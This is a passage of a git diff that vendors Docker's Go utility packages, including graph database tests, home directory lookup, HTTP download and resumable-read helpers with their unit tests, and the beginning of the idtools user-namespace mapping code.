+	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := db.Delete("/webapp/sentry"); err != nil {
+		t.Fatal(err)
+	}
+	entity := db.Get("/webapp/sentry")
+	if entity != nil {
+		t.Fatal("Entity /webapp/sentry should be nil")
+	}
+}
+
+func TestCountRefs(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/webapp", "1")
+
+	if db.Refs("1") != 1 {
+		t.Fatal("Expect reference count to be 1")
+	}
+
+	db.Set("/db", "2")
+	db.Set("/webapp/db", "2")
+	if db.Refs("2") != 2 {
+		t.Fatal("Expect reference count to be 2")
+	}
+}
+
+func TestPurgeId(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/webapp", "1")
+
+	if c := db.Refs("1"); c != 1 {
+		t.Fatalf("Expect reference count to be 1, got %d", c)
+	}
+
+	db.Set("/db", "2")
+	db.Set("/webapp/db", "2")
+
+	count, err := db.Purge("2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if count != 2 {
+		t.Fatalf("Expected 2 references to be removed, got %d", count)
+	}
+}
+
+// Regression test https://github.com/docker/docker/issues/12334
+func TestPurgeIdRefPaths(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/webapp", "1")
+	db.Set("/db", "2")
+
+	db.Set("/db/webapp", "1")
+
+	if c := db.Refs("1"); c != 2 {
+		t.Fatalf("Expected 2 reference for webapp, got %d", c)
+	}
+	if c := db.Refs("2"); c != 1 {
+		t.Fatalf("Expected 1 reference for db, got %d", c)
+	}
+
+	if rp := db.RefPaths("2"); len(rp) != 1 {
+		t.Fatalf("Expected 1 reference path for db, got %d", len(rp))
+	}
+
+	count, err := db.Purge("2")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if count != 2 {
+		t.Fatalf("Expected 2 rows to be removed, got %d", count)
+	}
+
+	if c := db.Refs("2"); c != 0 {
+		t.Fatalf("Expected 0 reference for db, got %d", c)
+	}
+	if c := db.Refs("1"); c != 1 {
+		t.Fatalf("Expected 1 reference for webapp, got %d", c)
+	}
+}
+
+func TestRename(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/webapp", "1")
+
+	if db.Refs("1") != 1 {
+		t.Fatal("Expect reference count to be 1")
+	}
+
+	db.Set("/db", "2")
+	db.Set("/webapp/db", "2")
+
+	if db.Get("/webapp/db") == nil {
+		t.Fatal("Cannot find entity at path /webapp/db")
+	}
+
+	if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil {
+		t.Fatal(err)
+	}
+	if db.Get("/webapp/db") != nil {
+		t.Fatal("Entity should not exist at /webapp/db")
+	}
+	if db.Get("/webapp/newdb") == nil {
+		t.Fatal("Cannot find entity at path /webapp/newdb")
+	}
+
+}
+
+func TestCreateMultipleNames(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/db", "1")
+	if _, err := db.Set("/myapp", "1"); err != nil {
+		t.Fatal(err)
+	}
+
+	db.Walk("/", func(p string, e *Entity) error {
+		t.Logf("%s\n", p)
+		return nil
+	}, -1)
+}
+
+func TestRefPaths(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/webapp", "1")
+
+	db.Set("/db", "2")
+	db.Set("/webapp/db", "2")
+
+	refs := db.RefPaths("2")
+	if len(refs) != 2 {
+		t.Fatalf("Expected reference count to be 2, got %d", len(refs))
+	}
+}
+
+func TestExistsTrue(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/testing", "1")
+
+	if !db.Exists("/testing") {
+		t.Fatalf("/tesing should exist")
+	}
+}
+
+func TestExistsFalse(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/toerhe", "1")
+
+	if db.Exists("/testing") {
+		t.Fatalf("/tesing should not exist")
+	}
+
+}
+
+func TestGetNameWithTrailingSlash(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/todo", "1")
+
+	e := db.Get("/todo/")
+	if e == nil {
+		t.Fatalf("Entity should not be nil")
+	}
+}
+
+func TestConcurrentWrites(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	errs := make(chan error, 2)
+
+	save := func(name string, id string) {
+		if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil {
+			errs <- err
+		}
+		errs <- nil
+	}
+	purge := func(id string) {
+		if _, err := db.Purge(id); err != nil {
+			errs <- err
+		}
+		errs <- nil
+	}
+
+	save("/1", "1")
+
+	go purge("1")
+	go save("/2", "2")
+
+	any := false
+	for i := 0; i < 2; i++ {
+		if err := <-errs; err != nil {
+			any = true
+			t.Log(err)
+		}
+	}
+	if any {
+		t.Fail()
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
new file mode 100644
index 0000000000..c07df077d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
@@ -0,0 +1,27 @@
+package graphdb
+
+import "sort"
+
+type pathSorter struct {
+	paths []string
+	by    func(i, j string) bool
+}
+
+func sortByDepth(paths []string) {
+	s := &pathSorter{paths, func(i, j string) bool {
+		return PathDepth(i) > PathDepth(j)
+	}}
+	sort.Sort(s)
+}
+
+func (s *pathSorter) Len() int {
+	return len(s.paths)
+}
+
+func (s *pathSorter) Swap(i, j int) {
+	s.paths[i], s.paths[j] = s.paths[j], s.paths[i]
+}
+
+func (s *pathSorter) Less(i, j int) bool {
+	return s.by(s.paths[i], s.paths[j])
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
new file mode 100644
index 0000000000..ddf2266f60
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
@@ -0,0 +1,29 @@
+package graphdb
+
+import (
+	"testing"
+)
+
+func TestSort(t *testing.T) {
+	paths := []string{
+		"/",
+		"/myreallylongname",
+		"/app/db",
+	}
+
+	sortByDepth(paths)
+
+	if len(paths) != 3 {
+		t.Fatalf("Expected 3 parts got %d", len(paths))
+	}
+
+	if paths[0] != "/app/db" {
+		t.Fatalf("Expected /app/db got %s", paths[0])
+	}
+	if paths[1] != "/myreallylongname" {
+		t.Fatalf("Expected /myreallylongname got %s", paths[1])
+	}
+	if paths[2] != "/" {
+		t.Fatalf("Expected / got %s", paths[2])
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
new file mode 100644
index 0000000000..2b8ba71724
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
@@ -0,0 +1,3 @@
+// +build !cgo !linux
+
+package graphdb
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
new file mode 100644
index 0000000000..9edd79c35e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
@@ -0,0 +1,32 @@
+package graphdb
+
+import (
+	"path"
+	"strings"
+)
+
+// Split p on /
+func split(p string) []string {
+	return strings.Split(p, "/")
+}
+
+// PathDepth returns the depth or number of / in a given path
+func PathDepth(p string) int {
+	parts := split(p)
+	if len(parts) == 2 && parts[1] == "" {
+		return 1
+	}
+	return len(parts)
+}
+
+func splitPath(p string) (parent, name string) {
+	if p[0] != '/' {
+		p = "/" + p
+	}
+	parent, name = path.Split(p)
+	l := len(parent)
+	if parent[l-1] == '/' {
+		parent = parent[:l-1]
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir.go
new file mode 100644
index 0000000000..8154e83f0c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir.go
@@ -0,0 +1,39 @@
+package homedir
+
+import (
+	"os"
+	"runtime"
+
+	"github.com/opencontainers/runc/libcontainer/user"
+)
+
+// Key returns the env var name for the user's home dir based on
+// the platform being run on
+func Key() string {
+	if runtime.GOOS == "windows" {
+		return "USERPROFILE"
+	}
+	return "HOME"
+}
+
+// Get returns the home directory of the current user with the help of
+// environment variables depending on the target operating system.
+// Returned path should be used with "path/filepath" to form new paths.
+func Get() string {
+	home := os.Getenv(Key())
+	if home == "" && runtime.GOOS != "windows" {
+		if u, err := user.CurrentUser(); err == nil {
+			return u.Home
+		}
+	}
+	return home
+}
+
+// GetShortcutString returns the string that is shortcut to user's home directory
+// in the native shell of the platform running on.
+func GetShortcutString() string {
+	if runtime.GOOS == "windows" {
+		return "%USERPROFILE%" // be careful while using in format functions
+	}
+	return "~"
+}
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
new file mode 100644
index 0000000000..7a95cb2bd7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
@@ -0,0 +1,24 @@
+package homedir
+
+import (
+	"path/filepath"
+	"testing"
+)
+
+func TestGet(t *testing.T) {
+	home := Get()
+	if home == "" {
+		t.Fatal("returned home directory is empty")
+	}
+
+	if !filepath.IsAbs(home) {
+		t.Fatalf("returned path is not absolute: %s", home)
+	}
+}
+
+func TestGetShortcutString(t *testing.T) {
+	shortcut := GetShortcutString()
+	if shortcut == "" {
+		t.Fatal("returned shortcut string is empty")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go
new file mode 100644
index 0000000000..d7dc43877d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/httputils.go
@@ -0,0 +1,56 @@
+package httputils
+
+import (
+	"errors"
+	"fmt"
+	"net/http"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/pkg/jsonmessage"
+)
+
+var (
+	headerRegexp     = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`)
+	errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`")
+)
+
+// Download requests a given URL and returns an io.Reader.
+func Download(url string) (resp *http.Response, err error) {
+	if resp, err = http.Get(url); err != nil {
+		return nil, err
+	}
+	if resp.StatusCode >= 400 {
+		return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status)
+	}
+	return resp, nil
+}
+
+// NewHTTPRequestError returns a JSON response error.
+func NewHTTPRequestError(msg string, res *http.Response) error {
+	return &jsonmessage.JSONError{
+		Message: msg,
+		Code:    res.StatusCode,
+	}
+}
+
+// ServerHeader contains the server information.
+type ServerHeader struct {
+	App string // docker
+	Ver string // 1.8.0-dev
+	OS  string // windows or linux
+}
+
+// ParseServerHeader extracts pieces from an HTTP server header
+// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows).
+func ParseServerHeader(hdr string) (*ServerHeader, error) {
+	matches := headerRegexp.FindStringSubmatch(hdr)
+	if len(matches) != 4 {
+		return nil, errInvalidHeader
+	}
+	return &ServerHeader{
+		App: strings.TrimSpace(matches[1]),
+		Ver: strings.TrimSpace(matches[2]),
+		OS:  strings.TrimSpace(matches[3]),
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
new file mode 100644
index 0000000000..d35d082156
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
@@ -0,0 +1,115 @@
+package httputils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+)
+
+func TestDownload(t *testing.T) {
+	expected := "Hello, docker !"
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintf(w, expected)
+	}))
+	defer ts.Close()
+	response, err := Download(ts.URL)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	actual, err := ioutil.ReadAll(response.Body)
+	response.Body.Close()
+
+	if err != nil || string(actual) != expected {
+		t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual))
+	}
+}
+
+func TestDownload400Errors(t *testing.T) {
+	expectedError := "Got HTTP status code >= 400: 403 Forbidden"
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		// 403
+		http.Error(w, "something failed (forbidden)", http.StatusForbidden)
+	}))
+	defer ts.Close()
+	// Expected status code = 403
+	if _, err := Download(ts.URL); err == nil || err.Error() != expectedError {
+		t.Fatalf("Expected the the error %q, got %v", expectedError, err)
+	}
+}
+
+func TestDownloadOtherErrors(t *testing.T) {
+	if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") {
+		t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err)
+	}
+}
+
+func TestNewHTTPRequestError(t *testing.T) {
+	errorMessage := "Some error message"
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		// 403
+		http.Error(w, errorMessage, http.StatusForbidden)
+	}))
+	defer ts.Close()
+	httpResponse, err := http.Get(ts.URL)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage {
+		t.Fatalf("Expected err to be %q, got %v", errorMessage, err)
+	}
+}
+
+func TestParseServerHeader(t *testing.T) {
+	inputs := map[string][]string{
+		"bad header":           {"error"},
+		"(bad header)":         {"error"},
+		"(without/spaces)":     {"error"},
+		"(header/with spaces)": {"error"},
+		"foo/bar (baz)":        {"foo", "bar", "baz"},
+		"foo/bar":              {"error"},
+		"foo":                  {"error"},
+		"foo/bar (baz space)":           {"foo", "bar", "baz space"},
+		"  f  f  /  b  b  (  b  s  )  ": {"f  f", "b  b", "b  s"},
+		"foo/bar (baz) ignore":          {"foo", "bar", "baz"},
+		"foo/bar ()":                    {"error"},
+		"foo/bar()":                     {"error"},
+		"foo/bar(baz)":                  {"foo", "bar", "baz"},
+		"foo/bar/zzz(baz)":              {"foo/bar", "zzz", "baz"},
+		"foo/bar(baz/abc)":              {"foo", "bar", "baz/abc"},
+		"foo/bar(baz (abc))":            {"foo", "bar", "baz (abc)"},
+	}
+
+	for header, values := range inputs {
+		serverHeader, err := ParseServerHeader(header)
+		if err != nil {
+			if err != errInvalidHeader {
+				t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err)
+			}
+			if values[0] == "error" {
+				continue
+			}
+			t.Fatalf("Header %q failed to parse when it shouldn't have", header)
+		}
+		if values[0] == "error" {
+			t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader)
+		}
+
+		if serverHeader.App != values[0] {
+			t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App)
+		}
+
+		if serverHeader.Ver != values[1] {
+			t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver)
+		}
+
+		if serverHeader.OS != values[2] {
+			t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS)
+		}
+
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go
new file mode 100644
index 0000000000..d5cf34e4f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype.go
@@ -0,0 +1,30 @@
+package httputils
+
+import (
+	"mime"
+	"net/http"
+)
+
+// MimeTypes stores the MIME content type.
+var MimeTypes = struct {
+	TextPlain   string
+	Tar         string
+	OctetStream string
+}{"text/plain", "application/tar", "application/octet-stream"}
+
+// DetectContentType returns a best guess representation of the MIME
+// content type for the bytes at c.  The value detected by
+// http.DetectContentType is guaranteed not be nil, defaulting to
+// application/octet-stream when a better guess cannot be made. The
+// result of this detection is then run through mime.ParseMediaType()
+// which separates the actual MIME string from any parameters.
+func DetectContentType(c []byte) (string, map[string]string, error) {
+
+	ct := http.DetectContentType(c)
+	contentType, args, err := mime.ParseMediaType(ct)
+	if err != nil {
+		return "", nil, err
+	}
+
+	return contentType, args, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
new file mode 100644
index 0000000000..9de433ee8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
@@ -0,0 +1,13 @@
+package httputils
+
+import (
+	"testing"
+)
+
+func TestDetectContentType(t *testing.T) {
+	input := []byte("That is just a plain text")
+
+	if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" {
+		t.Errorf("TestDetectContentType failed")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go
new file mode 100644
index 0000000000..bebc8608cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go
@@ -0,0 +1,95 @@
+package httputils
+
+import (
+	"fmt"
+	"io"
+	"net/http"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+)
+
+type resumableRequestReader struct {
+	client          *http.Client
+	request         *http.Request
+	lastRange       int64
+	totalSize       int64
+	currentResponse *http.Response
+	failures        uint32
+	maxFailures     uint32
+}
+
+// ResumableRequestReader makes it possible to resume reading a request's body transparently
+// maxfail is the number of times we retry to make requests again (not resumes)
+// totalsize is the total length of the body; auto detect if not provided
+func ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser {
+	return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize}
+}
+
+// ResumableRequestReaderWithInitialResponse makes it possible to resume
+// reading the body of an already initiated request.
+func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser {
+	return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse}
+}
+
+func (r *resumableRequestReader) Read(p []byte) (n int, err error) {
+	if r.client == nil || r.request == nil {
+		return 0, fmt.Errorf("client and request can't be nil\n")
+	}
+	isFreshRequest := false
+	if r.lastRange != 0 && r.currentResponse == nil {
+		readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize)
+		r.request.Header.Set("Range", readRange)
+		time.Sleep(5 * time.Second)
+	}
+	if r.currentResponse == nil {
+		r.currentResponse, err = r.client.Do(r.request)
+		isFreshRequest = true
+	}
+	if err != nil && r.failures+1 != r.maxFailures {
+		r.cleanUpResponse()
+		r.failures++
+		time.Sleep(5 * time.Duration(r.failures) * time.Second)
+		return 0, nil
+	} else if err != nil {
+		r.cleanUpResponse()
+		return 0, err
+	}
+	if r.currentResponse.StatusCode == 416 && r.lastRange == r.totalSize && r.currentResponse.ContentLength == 0 {
+		r.cleanUpResponse()
+		return 0, io.EOF
+	} else if r.currentResponse.StatusCode != 206 && r.lastRange != 0 && isFreshRequest {
+		r.cleanUpResponse()
+		return 0, fmt.Errorf("the server doesn't support byte ranges")
+	}
+	if r.totalSize == 0 {
+		r.totalSize = r.currentResponse.ContentLength
+	} else if r.totalSize <= 0 {
+		r.cleanUpResponse()
+		return 0, fmt.Errorf("failed to auto detect content length")
+	}
+	n, err = r.currentResponse.Body.Read(p)
+	r.lastRange += int64(n)
+	if err != nil {
+		r.cleanUpResponse()
+	}
+	if err != nil && err != io.EOF {
+		logrus.Infof("encountered error during pull and clearing it before resume: %s", err)
+		err = nil
+	}
+	return n, err
+}
+
+func (r *resumableRequestReader) Close() error {
+	r.cleanUpResponse()
+	r.client = nil
+	r.request = nil
+	return nil
+}
+
+func (r *resumableRequestReader) cleanUpResponse() {
+	if r.currentResponse != nil {
+		r.currentResponse.Body.Close()
+		r.currentResponse = nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go
new file mode 100644
index 0000000000..5a2906db77
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go
@@ -0,0 +1,307 @@
+package httputils
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+)
+
+func TestResumableRequestHeaderSimpleErrors(t *testing.T) {
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintln(w, "Hello, world !")
+	}))
+	defer ts.Close()
+
+	client := &http.Client{}
+
+	var req *http.Request
+	req, err := http.NewRequest("GET", ts.URL, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedError := "client and request can't be nil\n"
+	resreq := &resumableRequestReader{}
+	_, err = resreq.Read([]byte{})
+	if err == nil || err.Error() != expectedError {
+		t.Fatalf("Expected an error with '%s', got %v.", expectedError, err)
+	}
+
+	resreq = &resumableRequestReader{
+		client:    client,
+		request:   req,
+		totalSize: -1,
+	}
+	expectedError = "failed to auto detect content length"
+	_, err = resreq.Read([]byte{})
+	if err == nil || err.Error() != expectedError {
+		t.Fatalf("Expected an error with '%s', got %v.", expectedError, err)
+	}
+
+}
+
+// Not too much failures, bails out after some wait
+func TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) {
+	client := &http.Client{}
+
+	var badReq *http.Request
+	badReq, err := http.NewRequest("GET", "I'm not an url", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resreq := &resumableRequestReader{
+		client:      client,
+		request:     badReq,
+		failures:    0,
+		maxFailures: 2,
+	}
+	read, err := resreq.Read([]byte{})
+	if err != nil || read != 0 {
+		t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read)
+	}
+}
+
+// Too much failures, returns the error
+func TestResumableRequestHeaderTooMuchFailures(t *testing.T) {
+	client := &http.Client{}
+
+	var badReq *http.Request
+	badReq, err := http.NewRequest("GET", "I'm not an url", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resreq := &resumableRequestReader{
+		client:      client,
+		request:     badReq,
+		failures:    0,
+		maxFailures: 1,
+	}
+	defer resreq.Close()
+
+	expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""`
+	read, err := resreq.Read([]byte{})
+	if err == nil || err.Error() != expectedError || read != 0 {
+		t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read)
+	}
+}
+
+type errorReaderCloser struct{}
+
+func (errorReaderCloser) Close() error { return nil }
+
+func (errorReaderCloser) Read(p []byte) (n int, err error) {
+	return 0, fmt.Errorf("An error occurred")
+}
+
+// If an unknown error is encountered, return 0, nil and log it
+func TestResumableRequestReaderWithReadError(t *testing.T) {
+	var req *http.Request
+	req, err := http.NewRequest("GET", "", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+
+	response := &http.Response{
+		Status:        "500 Internal Server",
+		StatusCode:    500,
+		ContentLength: 0,
+		Close:         true,
+		Body:          errorReaderCloser{},
+	}
+
+	resreq := &resumableRequestReader{
+		client:          client,
+		request:         req,
+		currentResponse: response,
+		lastRange:       1,
+		totalSize:       1,
+	}
+	defer resreq.Close()
+
+	buf := make([]byte, 1)
+	read, err := resreq.Read(buf)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if read != 0 {
+		t.Fatalf("Expected to have read nothing, but read %v", read)
+	}
+}
+
+func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) {
+	var req *http.Request
+	req, err := http.NewRequest("GET", "", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+
+	response := &http.Response{
+		Status:        "416 Requested Range Not Satisfiable",
+		StatusCode:    416,
+		ContentLength: 0,
+		Close:         true,
+		Body:          ioutil.NopCloser(strings.NewReader("")),
+	}
+
+	resreq := &resumableRequestReader{
+		client:          client,
+		request:         req,
+		currentResponse: response,
+		lastRange:       1,
+		totalSize:       1,
+	}
+	defer resreq.Close()
+
+	buf := make([]byte, 1)
+	_, err = resreq.Read(buf)
+	if err == nil || err != io.EOF {
+		t.Fatalf("Expected an io.EOF error, got %v", err)
+	}
+}
+
+func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) {
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if r.Header.Get("Range") == "" {
+			t.Fatalf("Expected a Range HTTP header, got nothing")
+		}
+	}))
+	defer ts.Close()
+
+	var req *http.Request
+	req, err := http.NewRequest("GET", ts.URL, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+
+	resreq := &resumableRequestReader{
+		client:    client,
+		request:   req,
+		lastRange: 1,
+	}
+	defer resreq.Close()
+
+	buf := make([]byte, 2)
+	_, err = resreq.Read(buf)
+	if err == nil || err.Error() != "the server doesn't support byte ranges" {
+		t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err)
+	}
+}
+
+func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) {
+
+	srvtxt := "some response text data"
+
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintln(w, srvtxt)
+	}))
+	defer ts.Close()
+
+	var req *http.Request
+	req, err := http.NewRequest("GET", ts.URL, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+	retries := uint32(5)
+
+	resreq := ResumableRequestReader(client, req, retries, 0)
+	defer resreq.Close()
+
+	data, err := ioutil.ReadAll(resreq)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resstr := strings.TrimSuffix(string(data), "\n")
+
+	if resstr != srvtxt {
+		t.Errorf("resstr != srvtxt")
+	}
+}
+
+func TestResumableRequestReader(t *testing.T) {
+
+	srvtxt := "some response text data"
+
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintln(w, srvtxt)
+	}))
+	defer ts.Close()
+
+	var req *http.Request
+	req, err := http.NewRequest("GET", ts.URL, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+	retries := uint32(5)
+	imgSize := int64(len(srvtxt))
+
+	resreq := ResumableRequestReader(client, req, retries, imgSize)
+	defer resreq.Close()
+
+	data, err := ioutil.ReadAll(resreq)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resstr := strings.TrimSuffix(string(data), "\n")
+
+	if resstr != srvtxt {
+		t.Errorf("resstr != srvtxt")
+	}
+}
+
+func TestResumableRequestReaderWithInitialResponse(t *testing.T) {
+
+	srvtxt := "some response text data"
+
+	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		fmt.Fprintln(w, srvtxt)
+	}))
+	defer ts.Close()
+
+	var req *http.Request
+	req, err := http.NewRequest("GET", ts.URL, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	client := &http.Client{}
+	retries := uint32(5)
+	imgSize := int64(len(srvtxt))
+
+	res, err := client.Do(req)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res)
+	defer resreq.Close()
+
+	data, err := ioutil.ReadAll(resreq)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	resstr := strings.TrimSuffix(string(data), "\n")
+
+	if resstr != srvtxt {
+		t.Errorf("resstr != srvtxt")
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go b/vendor/github.com/docker/docker/pkg/idtools/idtools.go
new file mode 100644
index 0000000000..6bca466286
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools.go
@@ -0,0 +1,197 @@
+package idtools
+
+import (
+	"bufio"
+	"fmt"
+	"os"
+	"sort"
+	"strconv"
+	"strings"
+)
+
+// IDMap contains a single entry for user namespace range remapping. An array
+// of IDMap entries represents the structure that will be provided to the Linux
+// kernel for creating a user namespace.
+type IDMap struct {
+	ContainerID int `json:"container_id"`
+	HostID      int `json:"host_id"`
+	Size        int `json:"size"`
+}
+
+type subIDRange struct {
+	Start  int
+	Length int
+}
+
+type ranges []subIDRange
+
+func (e ranges) Len() int           { return len(e) }
+func (e ranges) Swap(i, j int)      { e[i], e[j] = e[j], e[i] }
+func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start }
+
+const (
+	subuidFileName string = "/etc/subuid"
+	subgidFileName string = "/etc/subgid"
+)
+
+// MkdirAllAs creates a directory (include any along the path) and then modifies
